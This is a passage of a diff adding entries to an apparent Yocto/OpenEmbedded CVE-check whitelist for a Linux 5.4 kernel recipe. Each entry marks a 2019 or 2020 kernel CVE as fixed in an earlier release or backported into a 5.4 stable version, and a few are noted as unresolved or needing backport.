+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-18786"
+
+# fixed-version: Fixed after version 5.1rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18805"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18806"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18807"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-18808"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-18809"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-18810"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18811"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-18812"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18813"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2019-18814"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18885"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19036"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19037"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19039"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2019-19043"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19044"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19045"
+
+# cpe-stable-backport: Backported in 5.4.15
+CVE_CHECK_WHITELIST += "CVE-2019-19046"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19047"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19048"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19049"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19050"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19051"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19052"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19053"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2019-19054"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19055"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19056"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19057"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19058"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19059"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19060"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19061"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19062"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19063"
+
+# cpe-stable-backport: Backported in 5.4.13
+CVE_CHECK_WHITELIST += "CVE-2019-19064"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19065"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19066"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19067"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19068"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19069"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19070"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19071"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19072"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19073"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19074"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19075"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19076"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19077"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-19078"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-19079"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19080"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19081"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19082"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19083"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19227"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2019-19241"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19252"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19318"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19319"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19332"
+
+# cpe-stable-backport: Backported in 5.4.3
+CVE_CHECK_WHITELIST += "CVE-2019-19338"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2019-19377"
+
+# CVE-2019-19378 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2019-19447"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2019-19448"
+
+# CVE-2019-19449 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2019-19462"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19523"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-19524"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-19525"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19526"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19527"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-19528"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19529"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19530"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19531"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19532"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19533"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19534"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19535"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-19536"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-19537"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19543"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19602"
+
+# cpe-stable-backport: Backported in 5.4.2
+CVE_CHECK_WHITELIST += "CVE-2019-19767"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2019-19768"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2019-19769"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2019-19770"
+
+# fixed-version: Fixed after version 5.4rc7
+CVE_CHECK_WHITELIST += "CVE-2019-19807"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19813"
+
+# CVE-2019-19814 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19922"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-19927"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-19947"
+
+# cpe-stable-backport: Backported in 5.4.9
+CVE_CHECK_WHITELIST += "CVE-2019-19965"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-19966"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-1999"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20054"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20095"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-20096"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2024"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2019-2025"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20422"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2054"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-20636"
+
+# CVE-2019-20794 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20806"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2019-20810"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-20811"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-20812"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-20908"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-20934"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2101"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2181"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2019-2182"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-2213"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-2214"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2019-2215"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-25044"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-25045"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-25160"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2019-25162"
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2019-3016"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3459"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3460"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-3701"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3819"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3837"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3846"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3874"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3882"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3887"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3892"
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2019-3896"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-3900"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2019-3901"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-5108"
+
+# Skipping CVE-2019-5489, no affected_versions
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-6133"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-6974"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7221"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-7222"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-7308"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-8912"
+
+# fixed-version: Fixed after version 5.0rc6
+CVE_CHECK_WHITELIST += "CVE-2019-8956"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-8980"
+
+# fixed-version: Fixed after version 5.0rc4
+CVE_CHECK_WHITELIST += "CVE-2019-9003"
+
+# fixed-version: Fixed after version 5.0rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9162"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-9213"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9245"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9444"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9445"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9453"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2019-9454"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9455"
+
+# fixed-version: Fixed after version 4.16rc6
+CVE_CHECK_WHITELIST += "CVE-2019-9456"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9457"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2019-9458"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9466"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9500"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-9503"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-9506"
+
+# fixed-version: Fixed after version 5.1rc2
+CVE_CHECK_WHITELIST += "CVE-2019-9857"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0009"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2020-0030"
+
+# cpe-stable-backport: Backported in 5.4.4
+CVE_CHECK_WHITELIST += "CVE-2020-0041"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2020-0066"
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-0067"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-0110"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-0255"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0305"
+
+# CVE-2020-0347 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.19
+CVE_CHECK_WHITELIST += "CVE-2020-0404"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-0423"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2020-0427"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-0429"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0430"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2020-0431"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-0432"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0433"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2020-0435"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-0444"
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2020-0465"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-0466"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-0543"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-10135"
+
+# cpe-stable-backport: Backported in 5.4.8
+CVE_CHECK_WHITELIST += "CVE-2020-10690"
+
+# CVE-2020-10708 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-10711"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10720"
+
+# cpe-stable-backport: Backported in 5.4.44
+CVE_CHECK_WHITELIST += "CVE-2020-10732"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2020-10742"
+
+# cpe-stable-backport: Backported in 5.4.39
+CVE_CHECK_WHITELIST += "CVE-2020-10751"
+
+# cpe-stable-backport: Backported in 5.4.45
+CVE_CHECK_WHITELIST += "CVE-2020-10757"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10766"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10767"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-10768"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2020-10769"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2020-10773"
+
+# CVE-2020-10774 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-10781"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-10942"
+
+# cpe-stable-backport: Backported in 5.4.32
+CVE_CHECK_WHITELIST += "CVE-2020-11494"
+
+# cpe-stable-backport: Backported in 5.4.31
+CVE_CHECK_WHITELIST += "CVE-2020-11565"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11608"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11609"
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-11668"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-11669"
+
+# CVE-2020-11725 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-11884"
+
+# CVE-2020-11935 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2020-12114"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12351"
+
+# cpe-stable-backport: Backported in 5.4.72
+CVE_CHECK_WHITELIST += "CVE-2020-12352"
+
+# CVE-2020-12362 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12363 needs backporting (fixed from 5.11rc1)
+
+# CVE-2020-12364 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.36
+CVE_CHECK_WHITELIST += "CVE-2020-12464"
+
+# cpe-stable-backport: Backported in 5.4.26
+CVE_CHECK_WHITELIST += "CVE-2020-12465"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2020-12652"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12653"
+
+# cpe-stable-backport: Backported in 5.4.20
+CVE_CHECK_WHITELIST += "CVE-2020-12654"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-12655"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-12656"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12657"
+
+# cpe-stable-backport: Backported in 5.4.35
+CVE_CHECK_WHITELIST += "CVE-2020-12659"
+
+# cpe-stable-backport: Backported in 5.4.43
+CVE_CHECK_WHITELIST += "CVE-2020-12768"
+
+# cpe-stable-backport: Backported in 5.4.17
+CVE_CHECK_WHITELIST += "CVE-2020-12769"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-12770"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-12771"
+
+# cpe-stable-backport: Backported in 5.4.33
+CVE_CHECK_WHITELIST += "CVE-2020-12826"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-12888"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-12912"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-13143"
+
+# cpe-stable-backport: Backported in 5.4.46
+CVE_CHECK_WHITELIST += "CVE-2020-13974"
+
+# CVE-2020-14304 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2020-14305"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-14314"
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-14331"
+
+# cpe-stable-backport: Backported in 5.4.78
+CVE_CHECK_WHITELIST += "CVE-2020-14351"
+
+# fixed-version: Fixed after version 4.14rc3
+CVE_CHECK_WHITELIST += "CVE-2020-14353"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2020-14356"
+
+# cpe-stable-backport: Backported in 5.4.28
+CVE_CHECK_WHITELIST += "CVE-2020-14381"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14385"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-14386"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-14390"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-14416"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-15393"
+
+# cpe-stable-backport: Backported in 5.4.49
+CVE_CHECK_WHITELIST += "CVE-2020-15436"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-15437"
+
+# cpe-stable-backport: Backported in 5.4.50
+CVE_CHECK_WHITELIST += "CVE-2020-15780"
+
+# CVE-2020-15802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-15852"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2020-16119"
+
+# CVE-2020-16120 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.57
+CVE_CHECK_WHITELIST += "CVE-2020-16166"
+
+# cpe-stable-backport: Backported in 5.4.5
+CVE_CHECK_WHITELIST += "CVE-2020-1749"
+
+# cpe-stable-backport: Backported in 5.4.51
+CVE_CHECK_WHITELIST += "CVE-2020-24394"
+
+# cpe-stable-backport: Backported in 5.4.56
+CVE_CHECK_WHITELIST += "CVE-2020-24490"
+
+# CVE-2020-24502 has no known resolution
+
+# CVE-2020-24503 has no known resolution
+
+# CVE-2020-24504 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24586"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24587"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-24588"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2020-25211"
+
+# cpe-stable-backport: Backported in 5.4.60
+CVE_CHECK_WHITELIST += "CVE-2020-25212"
+
+# CVE-2020-25220 has no known resolution
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-25221"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-25284"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25285"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2020-25639"
+
+# cpe-stable-backport: Backported in 5.4.64
+CVE_CHECK_WHITELIST += "CVE-2020-25641"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25643"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2020-25645"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25656"
+
+# CVE-2020-25661 has no known resolution
+
+# CVE-2020-25662 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-25668"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-25669"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25670"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25671"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25672"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2020-25673"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-25704"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-25705"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2020-26088"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26139"
+
+# CVE-2020-26140 has no known resolution
+
